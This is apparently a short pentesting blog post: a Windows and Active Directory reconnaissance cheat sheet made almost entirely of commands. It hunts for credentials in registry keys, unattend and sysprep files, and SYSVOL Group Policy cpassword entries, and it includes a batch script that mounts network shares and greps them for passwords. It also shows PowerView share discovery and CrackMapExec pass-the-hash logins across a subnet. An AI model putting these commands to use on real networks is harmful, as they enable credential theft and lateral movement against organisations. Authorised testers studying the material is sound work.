Windows Recon (Cheat Sheet)

0x7a616368
Jul 3 · 2 min read

Windows OS Enumeration

net config Workstation
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
hostname
net users
ipconfig /all
route print
arp -A
netstat -ano
netsh firewall show state
netsh firewall show config
schtasks /query /fo LIST /v
tasklist /SVC
net start
DRIVERQUERY
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
dir /s pass == cred == vnc == .config
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Find Goodies

Service Account Credentials within SYSVOL Group Policy Preferences (GPP)

findstr /S /I cpassword \\domain.com\sysvol\domain.com\policies\*.xml

Find in files and registry

findstr /snip password *.xml *.ini *.txt (quicker than below)
findstr /snip password *
dir /s *password* == *cred* == *vnc* == *.config*dir c:\*vnc.ini /s /bc:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

GPO settings

gpresult /z
gpresult /H (for Pretty HTML output)

Users, Groups and Privileges

net localgroup administrators /domain
net group “Domain Controllers” /domain
net group “Domain Admins” /domain
net group “Enterprise Admins” /domain
net user /domain <UserName>
Get-ADDomainController -filter * | select hostname, operatingsystemGet-ADFineGrainedPasswordPolicy -filter *Get-ADDefaultDomainPasswordPolicyGet-ADUser <UserName>-Properties *Get-ADUser -filter * -properties Name, PasswordNeverExpires | where {$_.passwordNeverExpires -eq "true" } | Select-Object DistinguishedName,Name,EnabledGet-ADGroupMember -identity <GroupName>Get-ADComputer -filter * | select nameGet-GPO -all | select DisplayName, gpostatus

SMB File Shares

Find Hosts with SMB Open (CrackMapExec)

cme smb 192.168.1.0/24

Find Open Shares (PowerView)

Invoke-ShareFinder -HostList hosts_with_smb.txt -NoPing -CheckShareAccess | Out-File -Encoding ascii found_shares.txt

Permissions (PowerView)

Invoke-FileFinder -ShareList .\found_shares.txt | ForEach-Object {Get-Acl $_.FullName} | Select-Object -Property Path,Owner,Group,AccessToString | Export-Csv Permissions.csv

Find Interesting file names from Share list (PowerView)

Invoke-FileFinder -ShareList found_shares.txt -Terms confidential, password -Verbose | ForEach-Object {Get-Acl $_.FullName} | Format-List

LOLBIN Script to search for in-file passwords in open shares

@echo off
for /F “tokens=*” %%a in (found_shares.txt) do (
C:
NET USE Z: /delete /y
net use z: “%%a”
Z:
echo %%a
echo %%a >> “output_file.txt”
if exist z:\ ( findstr /snip password * >> “output_file.txt” )
)

Use password or hash for authentication

cme smb 192.168.1.0/24 -u UserName -H 'LM:NT'
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORDHERE'

Lists

https://github.com/danielmiessler/SecLists